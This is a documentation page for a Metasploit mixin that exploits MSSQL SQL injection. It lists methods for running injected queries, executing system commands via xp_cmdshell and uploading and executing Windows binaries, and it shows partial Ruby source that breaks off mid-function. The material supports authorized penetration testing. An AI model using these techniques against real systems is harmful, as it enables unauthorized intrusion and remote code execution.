adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Exploit/Remote/MSSQL_SQLI.html
T
jenkins-metasploit c3f5bd3de2 Reboot gh-pages
2026-05-08 17:08:43 +00:00

784 lines
68 KiB
HTML
Raw Blame History

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Remote::MSSQL_SQLI
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Remote::MSSQL_SQLI";
relpath = '../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../_index.html">Index (M)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span>
&raquo;
<span class="title">MSSQL_SQLI</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Remote::MSSQL_SQLI
</h1>
<div class="box_info">
<dl>
<dt>Includes:</dt>
<dd><span class='object_link'><a href="HttpClient.html" title="Msf::Exploit::Remote::HttpClient (module)">HttpClient</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/mssql_sqli.rb</dd>
</dl>
</div>
<h2>Overview</h2><div class="docstring">
<div class="discussion">
<p>This module wraps functionality for exploiting SQL injection vulnerabilities Some of the functionality has been borrowed from mssql.rb</p>
</div>
</div>
<div class="tags">
</div>
<h2>Instance Attribute Summary</h2>
<h3 class="inherited">Attributes included from <span class='object_link'><a href="HttpClient.html" title="Msf::Exploit::Remote::HttpClient (module)">HttpClient</a></span></h3>
<p class="inherited"><span class='object_link'><a href="HttpClient.html#client-instance_method" title="Msf::Exploit::Remote::HttpClient#client (method)">#client</a></span>, <span class='object_link'><a href="HttpClient.html#cookie_jar-instance_method" title="Msf::Exploit::Remote::HttpClient#cookie_jar (method)">#cookie_jar</a></span></p>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(info = {}) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Creates an instance of a MSSQL exploit module.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#mssql_query-instance_method" title="#mssql_query (instance method)">#<strong>mssql_query</strong>(sqla, doprint = false) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Issue a SQL query using the SQL injection point.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#mssql_upload_exec-instance_method" title="#mssql_upload_exec (instance method)">#<strong>mssql_upload_exec</strong>(exe, debug = false) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Upload and execute a Windows binary through MSSQL queries.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#mssql_xpcmdshell-instance_method" title="#mssql_xpcmdshell (instance method)">#<strong>mssql_xpcmdshell</strong>(cmd, doprint = false, opts = {}) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Execute a system command via xp_cmdshell.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#powershell_upload_exec-instance_method" title="#powershell_upload_exec (instance method)">#<strong>powershell_upload_exec</strong>(exe, debug = false) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Upload and execute a Windows binary through MSSQL queries and Powershell.</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Methods included from <span class='object_link'><a href="HttpClient.html" title="Msf::Exploit::Remote::HttpClient (module)">HttpClient</a></span></h3>
<p class="inherited"><span class='object_link'><a href="HttpClient.html#basic_auth-instance_method" title="Msf::Exploit::Remote::HttpClient#basic_auth (method)">#basic_auth</a></span>, <span class='object_link'><a href="HttpClient.html#cleanup-instance_method" title="Msf::Exploit::Remote::HttpClient#cleanup (method)">#cleanup</a></span>, <span class='object_link'><a href="HttpClient.html#configure_http_login_scanner-instance_method" title="Msf::Exploit::Remote::HttpClient#configure_http_login_scanner (method)">#configure_http_login_scanner</a></span>, <span class='object_link'><a href="HttpClient.html#connect-instance_method" title="Msf::Exploit::Remote::HttpClient#connect (method)">#connect</a></span>, <span class='object_link'><a href="HttpClient.html#connect_ws-instance_method" title="Msf::Exploit::Remote::HttpClient#connect_ws (method)">#connect_ws</a></span>, <span class='object_link'><a href="HttpClient.html#deregister_http_client_options-instance_method" title="Msf::Exploit::Remote::HttpClient#deregister_http_client_options (method)">#deregister_http_client_options</a></span>, <span class='object_link'><a href="HttpClient.html#disconnect-instance_method" title="Msf::Exploit::Remote::HttpClient#disconnect (method)">#disconnect</a></span>, <span class='object_link'><a href="HttpClient.html#download-instance_method" title="Msf::Exploit::Remote::HttpClient#download (method)">#download</a></span>, <span class='object_link'><a href="HttpClient.html#full_uri-instance_method" title="Msf::Exploit::Remote::HttpClient#full_uri (method)">#full_uri</a></span>, <span class='object_link'><a href="HttpClient.html#handler-instance_method" title="Msf::Exploit::Remote::HttpClient#handler (method)">#handler</a></span>, <span class='object_link'><a href="HttpClient.html#http_fingerprint-instance_method" title="Msf::Exploit::Remote::HttpClient#http_fingerprint (method)">#http_fingerprint</a></span>, <span class='object_link'><a href="HttpClient.html#lookup_http_fingerprints-instance_method" title="Msf::Exploit::Remote::HttpClient#lookup_http_fingerprints (method)">#lookup_http_fingerprints</a></span>, <span class='object_link'><a href="HttpClient.html#normalize_uri-instance_method" title="Msf::Exploit::Remote::HttpClient#normalize_uri (method)">#normalize_uri</a></span>, <span class='object_link'><a href="HttpClient.html#path_from_uri-instance_method" title="Msf::Exploit::Remote::HttpClient#path_from_uri (method)">#path_from_uri</a></span>, <span class='object_link'><a href="HttpClient.html#peer-instance_method" title="Msf::Exploit::Remote::HttpClient#peer (method)">#peer</a></span>, <span class='object_link'><a href="HttpClient.html#proxies-instance_method" title="Msf::Exploit::Remote::HttpClient#proxies (method)">#proxies</a></span>, <span class='object_link'><a href="HttpClient.html#reconfig_redirect_opts!-instance_method" title="Msf::Exploit::Remote::HttpClient#reconfig_redirect_opts! (method)">#reconfig_redirect_opts!</a></span>, <span class='object_link'><a href="HttpClient.html#request_opts_from_url-instance_method" title="Msf::Exploit::Remote::HttpClient#request_opts_from_url (method)">#request_opts_from_url</a></span>, <span class='object_link'><a href="HttpClient.html#request_url-instance_method" title="Msf::Exploit::Remote::HttpClient#request_url (method)">#request_url</a></span>, <span class='object_link'><a href="HttpClient.html#rhost-instance_method" title="Msf::Exploit::Remote::HttpClient#rhost (method)">#rhost</a></span>, <span class='object_link'><a href="HttpClient.html#rport-instance_method" title="Msf::Exploit::Remote::HttpClient#rport (method)">#rport</a></span>, <span class='object_link'><a href="HttpClient.html#send_request_cgi-instance_method" title="Msf::Exploit::Remote::HttpClient#send_request_cgi (method)">#send_request_cgi</a></span>, <span class='object_link'><a href="HttpClient.html#send_request_cgi!-instance_method" title="Msf::Exploit::Remote::HttpClient#send_request_cgi! (method)">#send_request_cgi!</a></span>, <span class='object_link'><a href="HttpClient.html#send_request_raw-instance_method" title="Msf::Exploit::Remote::HttpClient#send_request_raw (method)">#send_request_raw</a></span>, <span class='object_link'><a href="HttpClient.html#service_details-instance_method" title="Msf::Exploit::Remote::HttpClient#service_details (method)">#service_details</a></span>, <span class='object_link'><a href="HttpClient.html#setup-instance_method" title="Msf::Exploit::Remote::HttpClient#setup (method)">#setup</a></span>, <span class='object_link'><a href="HttpClient.html#ssl-instance_method" title="Msf::Exploit::Remote::HttpClient#ssl (method)">#ssl</a></span>, <span class='object_link'><a href="HttpClient.html#ssl_version-instance_method" title="Msf::Exploit::Remote::HttpClient#ssl_version (method)">#ssl_version</a></span>, <span class='object_link'><a href="HttpClient.html#sslkeylogfile-instance_method" title="Msf::Exploit::Remote::HttpClient#sslkeylogfile (method)">#sslkeylogfile</a></span>, <span class='object_link'><a href="HttpClient.html#strip_tags-instance_method" title="Msf::Exploit::Remote::HttpClient#strip_tags (method)">#strip_tags</a></span>, <span class='object_link'><a href="HttpClient.html#target_uri-instance_method" title="Msf::Exploit::Remote::HttpClient#target_uri (method)">#target_uri</a></span>, <span class='object_link'><a href="HttpClient.html#validate_fingerprint-instance_method" title="Msf::Exploit::Remote::HttpClient#validate_fingerprint (method)">#validate_fingerprint</a></span>, <span class='object_link'><a href="HttpClient.html#vhost-instance_method" title="Msf::Exploit::Remote::HttpClient#vhost (method)">#vhost</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="Kerberos/ServiceAuthenticator/Options.html" title="Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options (module)">Kerberos::ServiceAuthenticator::Options</a></span></h3>
<p class="inherited"><span class='object_link'><a href="Kerberos/ServiceAuthenticator/Options.html#kerberos_auth_options-instance_method" title="Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options#kerberos_auth_options (method)">#kerberos_auth_options</a></span>, <span class='object_link'><a href="Kerberos/ServiceAuthenticator/Options.html#kerberos_clock_skew_seconds-instance_method" title="Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options#kerberos_clock_skew_seconds (method)">#kerberos_clock_skew_seconds</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="Kerberos/Ticket/Storage.html" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage (module)">Kerberos::Ticket::Storage</a></span></h3>
<p class="inherited"><span class='object_link'><a href="Kerberos/Ticket/Storage.html#kerberos_storage_options-instance_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage#kerberos_storage_options (method)">#kerberos_storage_options</a></span>, <span class='object_link'><a href="Kerberos/Ticket/Storage.html#kerberos_ticket_storage-instance_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage#kerberos_ticket_storage (method)">#kerberos_ticket_storage</a></span>, <span class='object_link'><a href="Kerberos/Ticket/Storage.html#store_ccache-class_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache (method)">store_ccache</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../Auxiliary/LoginScanner.html" title="Msf::Auxiliary::LoginScanner (module)">Auxiliary::LoginScanner</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../Auxiliary/LoginScanner.html#configure_login_scanner-instance_method" title="Msf::Auxiliary::LoginScanner#configure_login_scanner (method)">#configure_login_scanner</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../Auxiliary/Report.html" title="Msf::Auxiliary::Report (module)">Auxiliary::Report</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../Auxiliary/Report.html#active_db%3F-instance_method" title="Msf::Auxiliary::Report#active_db? (method)">#active_db?</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#create_cracked_credential-instance_method" title="Msf::Auxiliary::Report#create_cracked_credential (method)">#create_cracked_credential</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#create_credential-instance_method" title="Msf::Auxiliary::Report#create_credential (method)">#create_credential</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#create_credential_and_login-instance_method" title="Msf::Auxiliary::Report#create_credential_and_login (method)">#create_credential_and_login</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#create_credential_login-instance_method" title="Msf::Auxiliary::Report#create_credential_login (method)">#create_credential_login</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#db-instance_method" title="Msf::Auxiliary::Report#db (method)">#db</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#db_warning_given%3F-instance_method" title="Msf::Auxiliary::Report#db_warning_given? (method)">#db_warning_given?</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#get_client-instance_method" title="Msf::Auxiliary::Report#get_client (method)">#get_client</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#get_host-instance_method" title="Msf::Auxiliary::Report#get_host (method)">#get_host</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#inside_workspace_boundary%3F-instance_method" title="Msf::Auxiliary::Report#inside_workspace_boundary? (method)">#inside_workspace_boundary?</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#invalidate_login-instance_method" title="Msf::Auxiliary::Report#invalidate_login (method)">#invalidate_login</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#mytask-instance_method" title="Msf::Auxiliary::Report#mytask (method)">#mytask</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#myworkspace-instance_method" title="Msf::Auxiliary::Report#myworkspace (method)">#myworkspace</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#myworkspace_id-instance_method" title="Msf::Auxiliary::Report#myworkspace_id (method)">#myworkspace_id</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_auth_info-instance_method" title="Msf::Auxiliary::Report#report_auth_info (method)">#report_auth_info</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_client-instance_method" title="Msf::Auxiliary::Report#report_client (method)">#report_client</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_exploit-instance_method" title="Msf::Auxiliary::Report#report_exploit (method)">#report_exploit</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_host-instance_method" title="Msf::Auxiliary::Report#report_host (method)">#report_host</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_loot-instance_method" title="Msf::Auxiliary::Report#report_loot (method)">#report_loot</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_note-instance_method" title="Msf::Auxiliary::Report#report_note (method)">#report_note</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_service-instance_method" title="Msf::Auxiliary::Report#report_service (method)">#report_service</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_vuln-instance_method" title="Msf::Auxiliary::Report#report_vuln (method)">#report_vuln</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_web_form-instance_method" title="Msf::Auxiliary::Report#report_web_form (method)">#report_web_form</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_web_page-instance_method" title="Msf::Auxiliary::Report#report_web_page (method)">#report_web_page</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_web_site-instance_method" title="Msf::Auxiliary::Report#report_web_site (method)">#report_web_site</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_web_vuln-instance_method" title="Msf::Auxiliary::Report#report_web_vuln (method)">#report_web_vuln</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#store_cred-instance_method" title="Msf::Auxiliary::Report#store_cred (method)">#store_cred</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#store_local-instance_method" title="Msf::Auxiliary::Report#store_local (method)">#store_local</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#store_loot-instance_method" title="Msf::Auxiliary::Report#store_loot (method)">#store_loot</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Metasploit/Framework/Require.html" title="Metasploit::Framework::Require (module)">Metasploit::Framework::Require</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally-class_method" title="Metasploit::Framework::Require.optionally (method)">optionally</a></span>, <span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally_active_record_railtie-class_method" title="Metasploit::Framework::Require.optionally_active_record_railtie (method)">optionally_active_record_railtie</a></span>, <span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally_include_metasploit_credential_creation-class_method" title="Metasploit::Framework::Require.optionally_include_metasploit_credential_creation (method)">optionally_include_metasploit_credential_creation</a></span>, <span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally_include_metasploit_credential_creation-instance_method" title="Metasploit::Framework::Require#optionally_include_metasploit_credential_creation (method)">#optionally_include_metasploit_credential_creation</a></span>, <span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally_require_metasploit_db_gem_engines-class_method" title="Metasploit::Framework::Require.optionally_require_metasploit_db_gem_engines (method)">optionally_require_metasploit_db_gem_engines</a></span></p>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="initialize-instance_method">
#<strong>initialize</strong>(info = {}) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Creates an instance of a MSSQL exploit module.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/mssql_sqli.rb', line 18</span>
<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_info'>info</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>super</span>
<span class='comment'># Register the options that all MSSQL exploits may make use of.
</span> <span class='id identifier rubyid_register_options'>register_options</span><span class='lparen'>(</span>
<span class='lbracket'>[</span>
<span class='const'><span class='object_link'><a href="../../Opt.html" title="Msf::Opt (module)">Opt</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Opt.html#RHOST-constant" title="Msf::Opt::RHOST (constant)">RHOST</a></span></span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../Opt.html" title="Msf::Opt (module)">Opt</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Opt.html#RPORT-constant" title="Msf::Opt::RPORT (constant)">RPORT</a></span></span><span class='lparen'>(</span><span class='int'>80</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>METHOD</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>true</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GET or POST</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GET</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GET_PATH</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>true</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>The complete path with [SQLi] indicating the injection</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>/</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>DATA</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>POST data, if necessary, with [SQLi] indicating the injection</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>COOKIE</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Cookie value</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='rbracket'>]</span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="" title="Msf::Exploit::Remote::MSSQL_SQLI (module)">MSSQL_SQLI</a></span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_register_advanced_options'>register_advanced_options</span><span class='lparen'>(</span>
<span class='lbracket'>[</span>
<span class='const'><span class='object_link'><a href="../../OptPath.html" title="Msf::OptPath (class)">OptPath</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptBase.html#initialize-instance_method" title="Msf::OptBase#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>HEX2BINARY</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>The path to the hex2binary script on the disk</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span>
<span class='const'>File</span><span class='period'>.</span><span class='id identifier rubyid_join'>join</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Config.html" title="Msf::Config (class)">Config</a></span></span><span class='period'>.</span><span class='id identifier rubyid_data_directory'><span class='object_link'><a href="../../Config.html#data_directory-class_method" title="Msf::Config.data_directory (method)">data_directory</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>exploits</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>mssql</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>h2b</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='rbracket'>]</span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="" title="Msf::Exploit::Remote::MSSQL_SQLI (module)">MSSQL_SQLI</a></span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_register_autofilter_ports'>register_autofilter_ports</span><span class='lparen'>(</span><span class='lbracket'>[</span> <span class='int'>80</span><span class='comma'>,</span> <span class='int'>443</span><span class='comma'>,</span> <span class='int'>8080</span> <span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='id identifier rubyid_register_autofilter_services'>register_autofilter_services</span><span class='lparen'>(</span><span class='words_beg'>%W{</span><span class='words_sep'> </span><span class='tstring_content'>http</span><span class='words_sep'> </span><span class='tstring_content'>https</span><span class='words_sep'> </span><span class='tstring_end'>}</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="mssql_query-instance_method">
#<strong>mssql_query</strong>(sqla, doprint = false) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Issue a SQL query using the SQL injection point</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/mssql_sqli.rb', line 136</span>
<span class='kw'>def</span> <span class='id identifier rubyid_mssql_query'>mssql_query</span><span class='lparen'>(</span><span class='id identifier rubyid_sqla'>sqla</span><span class='comma'>,</span> <span class='id identifier rubyid_doprint'>doprint</span><span class='op'>=</span><span class='kw'>false</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='lparen'>(</span><span class='id identifier rubyid_doprint'>doprint</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='id identifier rubyid_sqla'>sqla</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>if</span> <span class='lparen'>(</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>METHOD</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GET</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GET_PATH</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_index'>index</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>[SQLi]</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Module/Failure.html#NoTarget-constant" title="Msf::Module::Failure::NoTarget (constant)">NoTarget</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>The SQL injection parameter was not specified in the GET path</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_uri'><span class='object_link'><a href="../../../top-level-namespace.html#uri-instance_method" title="#uri (method)">uri</a></span></span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GET_PATH</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>[SQLi]</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_uri_encode'>uri_encode</span><span class='lparen'>(</span><span class='id identifier rubyid_sqla'>sqla</span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_res'>res</span> <span class='op'>=</span> <span class='id identifier rubyid_send_request_cgi'>send_request_cgi</span><span class='lparen'>(</span><span class='lbrace'>{</span>
